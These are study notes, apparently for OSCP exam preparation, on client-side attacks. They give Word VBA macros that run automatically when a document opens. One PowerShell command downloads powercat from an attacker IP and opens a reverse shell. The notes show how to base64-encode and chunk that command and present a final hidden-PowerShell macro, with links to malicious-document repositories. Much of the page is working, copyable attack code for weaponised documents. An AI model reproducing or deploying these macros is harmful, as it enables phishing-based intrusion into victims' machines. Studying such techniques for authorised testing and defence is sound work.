🧪

Client Side Attacks

Notes from oscp.adot8.com — cool.

#cool#adot8
source · oscp.adot8.com · cool/client-side-attacks

Client-side Attacks

code
01exiftool -a -u quote.pdf

{% hint style="info" %} Passive recon viewing metadata of publicly available documents to view potential installed software on the target machine {% endhint %}

Use Canary Tokens to fingerprint the remote machine

{% embed url="https://canarytokens.org/generate" %}

Macros in Word documents

{% hint style="info" %} Save as .doc (Word 97-2003 Document) {% endhint %}

Open powershell

<pre><code>Sub AutoOpen() <strong> Mal </strong>End Sub Sub Document_Open() Mal <strong>End Sub </strong>Sub Mal() CreateObject("Wscript.Shell").Run "powershell" End Sub </code></pre>

Reverse shell macro

Encode in base64

code
01echo "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10/powercat.ps1');powercat -c 10.10.14.10 -p 1337 -e powershell" | base64

Python script to break ouput into smaller chunks

code
01str = "powershell.exe -nop -w hidden -e <base64 output>"
02n = 50
03for i in range(0, len(str), n):
04print("Str = Str + " + '"' + str[i:i+n] + '"')

Final Macro script

<pre><code>Sub AutoOpen() MyMacro End Sub Sub Document_Open() <strong> MyMacro </strong>End Sub Sub MyMacro() Dim Str As String Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU" Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd" Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB" Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA" Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA" <strong> Str = Str + "A== " </strong>CreateObject("Wscript.Shell").Run St </code></pre>

{% embed url="https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba" %}

{% embed url="https://github.com/k4sth4/Creating-a-Malicious-doc" %}